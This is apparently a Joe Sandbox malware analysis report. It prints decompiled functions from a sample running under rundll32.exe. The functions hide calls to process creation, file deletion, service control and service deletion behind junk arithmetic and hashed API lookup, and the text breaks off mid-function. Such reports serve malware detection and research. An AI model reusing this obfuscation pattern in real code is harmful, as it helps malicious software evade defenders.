Source File: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2143570427.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2143600770.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: Hh
API String ID: 2962429428-996502550
Opcode ID: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction ID: b1a1a2dc3468baee27e2ac0f81c817a390eacbe0c00c999d13fea3eb64b2d40a
Opcode Fuzzy Hash: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction Fuzzy Hash: 19110375D0020DEBEF05DFA8C9469AEBFB5EB40304F60C599E924AB261D3B99B118F40

Uniqueness

Uniqueness Score: -1.00%

Function 001D8409, Relevance: 1.6, APIs: 1, Instructions: 80
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E001D8409(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a40, long _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t57;
				void* _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				long _t86;

				_push(_a48);
				_t86 = __edx;
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001CE171(_t57);
				_v28 = 0x3438bc;
				_v24 = 0;
				_v12 = 0xcb52;
				_t74 = 0xd;
				_v12 = _v12 * 0x44;
				_v12 = _v12 * 0x51;
				_v12 = _v12 ^ 0x1116e99e;
				_v20 = 0x8d1c;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x00234fd5;
				_v8 = 0x5991;
				_t75 = 0x12;
				_v8 = _v8 / _t74;
				_v8 = _v8 / _t75;
				_v8 = _v8 ^ 0x00000693;
				_v16 = 0xdaea;
				_t76 = 0x6e;
				_v16 = _v16 / _t76;
				_v16 = _v16 ^ 0x00006144;
				E001C606F(0x128, 0xb6b01ae5, _t76, _t76, 0xd3c406ee);
				_t72 = CreateFileW(_a40, _a44, _a32, 0, _a8, _t86, 0); // executed
				return _t72;
			}

0x001d8411
0x001d8416
0x001d8418
0x001d841b
0x001d841e
0x001d841f
0x001d8422
0x001d8425
0x001d8428
0x001d842b
0x001d842c
0x001d842f
0x001d8432
0x001d8435
0x001d8437
0x001d843c
0x001d8445
0x001d8448
0x001d8455
0x001d8458
0x001d845f
0x001d8462
0x001d8469
0x001d8470
0x001d8474
0x001d847b
0x001d8487
0x001d8488
0x001d8494
0x001d8499
0x001d84a0
0x001d84aa
0x001d84b5
0x001d84b8
0x001d84d7
0x001d84ee
0x001d84f5

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00006144,?,00000000), ref: 001D84EE

Memory Dump Source

Source File: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2143570427.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2143600770.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction ID: 1e90740a973d47d08fb50011e67502f147803d5b038ad12153b94ac5ab43a993
Opcode Fuzzy Hash: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction Fuzzy Hash: EB31F472901208BBDF05DF95CD05CDEBFB6EF88314F108199F914A6250D7B69A20DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001D8165, Relevance: 1.6, APIs: 1, Instructions: 78
processCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E001D8165(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a4, struct _STARTUPINFOW* _a8, int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t47;
				int _t58;
				signed int _t61;
				void* _t65;
				WCHAR* _t66;
				WCHAR* _t67;

				_push(_a56);
				_t67 = __edx;
				_push(0);
				_push(_a48);
				_t66 = __ecx;
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001CE171(_t47);
				_v16 = 0xa2fc;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0xffff1f57;
				_v16 = _v16 ^ 0xffff035a;
				_v12 = 0x8842;
				_t61 = 0xc;
				_v12 = _v12 * 0xd;
				_push(0xd8c5ba15);
				_v12 = _v12 / _t61;
				_v12 = _v12 ^ 0x0000f812;
				_v20 = 0x5415;
				_push(_t61);
				_push(_t61);
				_push(0xb6b01ae5);
				_v20 = _v20 * 0x5b;
				_v20 = _v20 ^ 0x001da8a2;
				_v8 = 0xf8b5;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x80bbebc5;
				_v8 = _v8 ^ 0x80bbcffb;
				_t65 = 0x47;
				E001C606F(_t65);
				_t58 = CreateProcessW(_t66, _t67, 0, 0, _a20, 0, 0, 0, _a8, _a44); // executed
				return _t58;
			}

0x001d816e
0x001d8173
0x001d8175
0x001d8176
0x001d8179
0x001d817b
0x001d817e
0x001d817f
0x001d8182
0x001d8183
0x001d8186
0x001d8189
0x001d818c
0x001d818d
0x001d818e
0x001d8191
0x001d8194
0x001d8195
0x001d8196
0x001d819b
0x001d81a4
0x001d81a8
0x001d81af
0x001d81b6
0x001d81c3
0x001d81c7
0x001d81cf
0x001d81d4
0x001d81d7
0x001d81de
0x001d81e9
0x001d81ea
0x001d81eb
0x001d81f2
0x001d81f5
0x001d81fc
0x001d8203
0x001d8207
0x001d820e
0x001d8221
0x001d8222
0x001d823a
0x001d8242

APIs

CreateProcessW.KERNEL32(0BF52F2F,00000000,00000000,00000000,00000044,00000000,00000000,00000000,FFFF035A,?), ref: 001D823A

Memory Dump Source

Source File: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2143570427.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2143600770.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction ID: 388be4686743caaa7191f1b8de729827da16c6a1fbdd26fc82aac3bc7facd50e
Opcode Fuzzy Hash: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction Fuzzy Hash: F221E3B290020DBFEB058E94CC86CEEBFB9FB44358F108198F91466260D3759A519B50

Uniqueness

Uniqueness Score: -1.00%

Function 001C94A3, Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001C94A3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t58;
				void* _t59;

				_t59 = __edx;
				_t58 = __ecx;
				E001CE171(_t40);
				_v20 = 0xa96c;
				_v20 = _v20 ^ 0xdb4b0424;
				_v20 = _v20 ^ 0xdb4b8f37;
				_v8 = 0xec5f;
				_t53 = 0x33;
				_v8 = _v8 * 0x67;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 | 0x13f5ff17;
				_v8 = _v8 ^ 0x13f5eace;
				_v16 = 0x37e2;
				_v16 = _v16 * 0x6f;
				_v16 = _v16 ^ 0x001836ab;
				_v12 = 0x82bd;
				_v12 = _v12 >> 4;
				_t32 = _t53 + 0x5f; // 0x92
				_v12 = _v12 / _t53;
				_v12 = _v12 ^ 0x00002d3b;
				_t50 = E001C606F(_t32, 0xb6b01ae5, _t53, _t53, 0x2e5d2a1c);
				_t51 =  *_t50(_t58, 0, _t59, 0x28, __ecx, __edx, _a4, 0, 0x28, _a16, _a20, _a24); // executed
				return _t51;
			}

0x001c94ae
0x001c94b0
0x001c94c1
0x001c94c6
0x001c94cf
0x001c94d6
0x001c94dd
0x001c94ea
0x001c94ee
0x001c94f1
0x001c94f5
0x001c94fc
0x001c9503
0x001c951a
0x001c951d
0x001c9524
0x001c952b
0x001c9534
0x001c9537
0x001c953a
0x001c954d
0x001c955b
0x001c9562

APIs

SetFileInformationByHandle.KERNELBASE(6EE5A95E,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001C955B

Memory Dump Source

Source File: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2143570427.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2143600770.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction ID: 1ea032ae8c345a7e8b00b8ffd14956a7110f3542543a8bdb5ca2e39a6153cfee
Opcode Fuzzy Hash: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction Fuzzy Hash: CE215875E01208FBEB18DFA5C946ADEBFB5EB40304F108099F814BB291D3B45B15DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001C8289, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E001C8289(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t39;
				int _t49;
				signed int _t51;

				_push(_a4);
				E001CE171(_t39);
				_v36 = 0x41b5b5;
				asm("stosd");
				_t51 = 0x3d;
				asm("stosd");
				asm("stosd");
				_v12 = 0x9aa2;
				_v12 = _v12 + 0x23f6;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00001b6c;
				_v20 = 0x293c;
				_v20 = _v20 + 0xffff17af;
				_v20 = _v20 ^ 0xffff269b;
				_v16 = 0x3622;
				_v16 = _v16 | 0x78a52f71;
				_v16 = _v16 ^ 0x78a543e8;
				_v8 = 0x2f22;
				_v8 = _v8 + 0x35c7;
				_v8 = _v8 >> 2;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0000117e;
				E001C606F(0x314, 0xb6b01ae5, _t51, _t51, 0x1b106d81);
				_t49 = DeleteFileW(_a4); // executed
				return _t49;
			}

0x001c8290
0x001c8295
0x001c829a
0x001c82a8
0x001c82ab
0x001c82af
0x001c82b5
0x001c82b6
0x001c82bd
0x001c82c4
0x001c82c8
0x001c82cf
0x001c82d6
0x001c82dd
0x001c82e4
0x001c82eb
0x001c82f2
0x001c82f9
0x001c8300
0x001c8307
0x001c8311
0x001c8319
0x001c8332
0x001c833d
0x001c8343

APIs

DeleteFileW.KERNELBASE(00001B6C,?,?,?,?,?,?,00000000), ref: 001C833D

Memory Dump Source

Source File: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2143570427.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2143600770.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction ID: 9890a837b8bfe72b49af3072c9b04bb4e998f156bce9cf42e85f7265b3fa9db1
Opcode Fuzzy Hash: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction Fuzzy Hash: C4115B75E0120CFBEB08DFE9C84A9DEBBB5FB54304F108188E410A6264D3B84B198F50

Uniqueness

Uniqueness Score: -1.00%

Function 001C3296, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E001C3296(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t40;
				int _t49;
				signed int _t51;
				struct _SHFILEOPSTRUCTW* _t56;

				_push(_a4);
				_t56 = __ecx;
				_push(__ecx);
				E001CE171(_t40);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x1409b1;
				_v32 = 0x71de97;
				_v20 = 0x10af;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x000096e0;
				_v12 = 0xfce5;
				_v12 = _v12 ^ 0x58bbe0cf;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x02c5a2c7;
				_v16 = 0xf79b;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00000fb9;
				_v8 = 0xa9b8;
				_v8 = _v8 ^ 0x8b980f22;
				_t51 = 0xc;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0ba20c7c;
				E001C606F(0x21a, 0xf44a99f2, _t51, _t51, 0x438313f0);
				_t49 = SHFileOperationW(_t56); // executed
				return _t49;
			}

0x001c329d
0x001c32a0
0x001c32a3
0x001c32a4
0x001c32a9
0x001c32af
0x001c32b3
0x001c32ba
0x001c32c1
0x001c32c8
0x001c32cc
0x001c32d3
0x001c32da
0x001c32e1
0x001c32e5
0x001c32ec
0x001c32f3
0x001c32f7
0x001c32fe
0x001c3305
0x001c3311
0x001c331c
0x001c331f
0x001c333e
0x001c3347
0x001c334d

APIs

SHFileOperationW.SHELL32 ref: 001C3347

Memory Dump Source

Source File: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2143570427.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2143600770.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction ID: 99fe4ad416d3772bc232068192e4adee6eb0d16a17955a53c4bd4c4fed17c93b
Opcode Fuzzy Hash: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction Fuzzy Hash: 94111671D00219EBEB14DFE4C94AAEEBBB4EB54318F208199E814A7251C3B95B488F91

Uniqueness

Uniqueness Score: -1.00%

Function 001D9EEB, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E001D9EEB(void* __ecx, void* __edx, int _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t33;
				void* _t41;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E001CE171(_t33);
				_v36 = 0x1a5225;
				_v32 = 0x6186e9;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0x159f;
				_v20 = _v20 ^ 0xd8eb5afd;
				_v20 = _v20 ^ 0xd8eb17ca;
				_v16 = 0xd686;
				_v16 = _v16 * 0x29;
				_v16 = _v16 ^ 0x00226c98;
				_v12 = 0xd637;
				_v12 = _v12 | 0x41a2b1c9;
				_v12 = _v12 ^ 0x41a2fe45;
				_v8 = 0x7ffa;
				_v8 = _v8 | 0xd8d6b90f;
				_v8 = _v8 ^ 0xd8d6edd8;
				E001C606F(0x1ec, 0xbee648b, __ecx, __ecx, 0x6c130eb5);
				_t41 = OpenSCManagerW(0, 0, _a4); // executed
				return _t41;
			}

0x001d9ef2
0x001d9ef7
0x001d9efa
0x001d9efb
0x001d9eff
0x001d9f00
0x001d9f05
0x001d9f0f
0x001d9f1b
0x001d9f1e
0x001d9f21
0x001d9f28
0x001d9f2f
0x001d9f36
0x001d9f4d
0x001d9f50
0x001d9f57
0x001d9f5e
0x001d9f65
0x001d9f6c
0x001d9f73
0x001d9f7a
0x001d9f8d
0x001d9f9a
0x001d9fa0

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,41A2FE45,?,?,?,?,?,?,?,?,001D5A72,0000B2BF), ref: 001D9F9A

Memory Dump Source

Source File: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2143570427.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2143600770.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction ID: c563da2d3fa1e11bd525ca8a3ccb0d98b82da2358b78d4677cdaba006f69c63a
Opcode Fuzzy Hash: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction Fuzzy Hash: FB11F0B5D0122DABDB04DFE9C84A9EEBFB4EF05344F108189E815A6250D3B45B608FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 1616 Parent PID: 2860 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	18.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.3%
Total number of Nodes:	960
Total number of Limit Nodes:	15

Executed Functions

Function 004AF3A1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004AF3A1(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t47;
				int _t56;
				signed int _t58;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E004AE171(_t47);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x698c42;
				_v32 = 0x65248e;
				_v20 = 0xa27a;
				_v20 = _v20 + 0xffff8606;
				_v20 = _v20 ^ 0x0000421b;
				_v12 = 0x888c;
				_v12 = _v12 | 0xe1cd902e;
				_v12 = _v12 + 0xffffedb1;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x3619039d;
				_v8 = 0xd309;
				_v8 = _v8 + 0xffffb24a;
				_t58 = 0x7c;
				_v8 = _v8 / _t58;
				_v8 = _v8 + 0xffff0c2b;
				_v8 = _v8 ^ 0xffff0ba7;
				_v16 = 0xb808;
				_v16 = _v16 ^ 0x5e52e920;
				_v16 = _v16 ^ 0x5e521231;
				E004A606F(0x24a, 0xbee648b, _t58, _t58, 0x8c7a977b);
				_t56 = DeleteService(_a8); // executed
				return _t56;
			}

0x004af3a7
0x004af3aa
0x004af3ad
0x004af3b2
0x004af3b7
0x004af3bd
0x004af3c1
0x004af3c8
0x004af3cf
0x004af3d6
0x004af3dd
0x004af3e4
0x004af3eb
0x004af3f2
0x004af3f9
0x004af3fd
0x004af404
0x004af40b
0x004af417
0x004af422
0x004af425
0x004af42c
0x004af433
0x004af43a
0x004af441
0x004af460
0x004af46b
0x004af470

APIs

DeleteService.ADVAPI32(5E521231,?,?,?,?,?,?,?,?,004B5AB9), ref: 004AF46B

Strings

R^, xrefs: 004AF43A

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteService
String ID: R^
API String ID: 700001626-2418246705
Opcode ID: c572dde824089236a44e0ab9bbda36ed179f0479f126dd6d3edbdeaa6739ec59
Instruction ID: 9db8d3de2abb27d0eed8d1f5b11e1eed3216be6e2989d0bd66f0bc12778c1ac4
Opcode Fuzzy Hash: c572dde824089236a44e0ab9bbda36ed179f0479f126dd6d3edbdeaa6739ec59
Instruction Fuzzy Hash: A2214771D00309EFDF44DFE4C84A9AEBBB1FB44314F108188E511662A0D7B85B518F91

Uniqueness

Uniqueness Score: -1.00%

Function 004B7FC8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004B7FC8(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, void* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t43;
				void* _t54;
				signed int _t56;
				signed int _t57;
				long _t64;

				_push(_a16);
				_t64 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E004AE171(_t43);
				_v12 = 0x3d4b;
				_v12 = _v12 + 0xba0c;
				_v12 = _v12 ^ 0x32f19bab;
				_v12 = _v12 ^ 0x32f14d3d;
				_v20 = 0x6588;
				_t56 = 0x46;
				_v20 = _v20 / _t56;
				_v20 = _v20 ^ 0x00006149;
				_v8 = 0xc11f;
				_t57 = 0x1c;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00002da7;
				_v16 = 0xd6d7;
				_v16 = _v16 ^ 0xb4edc2cf;
				_v16 = _v16 ^ 0xb4ed5042;
				E004A606F(0xac, 0xb6b01ae5, _t57, _t57, 0xfa5912f8);
				_t54 = RtlAllocateHeap(_a16, _t64, _a8); // executed
				return _t54;
			}

0x004b7fcf
0x004b7fd2
0x004b7fd4
0x004b7fd7
0x004b7fda
0x004b7fdd
0x004b7fdf
0x004b7fe4
0x004b7fed
0x004b7ff4
0x004b7ffb
0x004b8002
0x004b800e
0x004b8013
0x004b8018
0x004b801f
0x004b8029
0x004b8034
0x004b8037
0x004b803b
0x004b8042
0x004b8049
0x004b8050
0x004b806f
0x004b807e
0x004b8084

APIs

RtlAllocateHeap.NTDLL(?,026DAAD3,B4ED5042,?,?,?,?,?,?,?,?,?,?), ref: 004B807E

Strings

Ia, xrefs: 004B8018
K=, xrefs: 004B7FE4

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: Ia$K=
API String ID: 1279760036-1694132640
Opcode ID: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction ID: 1d2ab1ada4527a77c10c68450c916942fcff168279ac19139b905f6e10a537b9
Opcode Fuzzy Hash: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction Fuzzy Hash: D3115C71E00218EBEF04DFE5C9068DEBFB1EB41314F108589EA1466250D3BA9A218B91

Uniqueness

Uniqueness Score: -1.00%

Function 004B29A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 004B2A76

Strings

-:, xrefs: 004B29C4

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: -:
API String ID: 1514166925-3625610842
Opcode ID: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction ID: 7db73cca83dee26696b12d12fff18607242d7fa87c8f6be22de7d4015686d761
Opcode Fuzzy Hash: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction Fuzzy Hash: 882153B2D01219BBDF15DFD5C84A8DEBBB5FF04748F108089E92862210D3B94B54DF90

Uniqueness

Uniqueness Score: -1.00%

Function 004A30A4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E004A30A4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t51;
				signed int _t53;
				signed int _t54;
				void* _t61;

				_push(_a12);
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E004AE171(_t40);
				_v20 = 0x20f1;
				_v20 = _v20 | 0xe56d7bd2;
				_v20 = _v20 ^ 0xe56d3b5f;
				_v16 = 0x60a3;
				_v16 = _v16 | 0xd94b0631;
				_v16 = _v16 ^ 0xd94b4fc4;
				_v8 = 0x959e;
				_t53 = 0x46;
				_v8 = _v8 / _t53;
				_v8 = _v8 + 0xffff8b5f;
				_t54 = 0x4f;
				_v8 = _v8 / _t54;
				_v8 = _v8 ^ 0x033dd111;
				_v12 = 0xe903;
				_v12 = _v12 + 0xffff1267;
				_v12 = _v12 ^ 0xffffff7c;
				E004A606F(0x14b, 0xbee648b, _t54, _t54, 0x43269794);
				_t51 = CloseServiceHandle(_t61); // executed
				return _t51;
			}

0x004a30ab
0x004a30ae
0x004a30b0
0x004a30b3
0x004a30b7
0x004a30b8
0x004a30bd
0x004a30c6
0x004a30cd
0x004a30d4
0x004a30db
0x004a30e2
0x004a30e9
0x004a30f5
0x004a30fa
0x004a30ff
0x004a3109
0x004a3114
0x004a3117
0x004a311e
0x004a3125
0x004a312c
0x004a314b
0x004a3154
0x004a315a

APIs

CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 004A3154

Strings

_;m, xrefs: 004A313C

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: _;m
API String ID: 1725840886-664033043
Opcode ID: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction ID: 5549a69a1cce1f983a017c4d3902228d34ba8d4ee32c9db9280c196689adff4b
Opcode Fuzzy Hash: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction Fuzzy Hash: 8A116D76E00218FFEB04DFE8CC468DEBB71EB45310F108589E424AB292D7B95B119B91

Uniqueness

Uniqueness Score: -1.00%

Function 004AE172, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004AE172(void* __ecx, void* __edx, void* _a4, int _a8, short* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t41;
				void* _t48;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E004AE171(_t41);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2ee32c;
				_v20 = 0x466;
				_v20 = _v20 + 0xbcb9;
				_v20 = _v20 ^ 0x000097c2;
				_v8 = 0x1d17;
				_v8 = _v8 + 0xe3a6;
				_v8 = _v8 | 0x1371b482;
				_v8 = _v8 + 0xcae3;
				_v8 = _v8 ^ 0x13721426;
				_v16 = 0xc1c8;
				_v16 = _v16 + 0xffff2ba9;
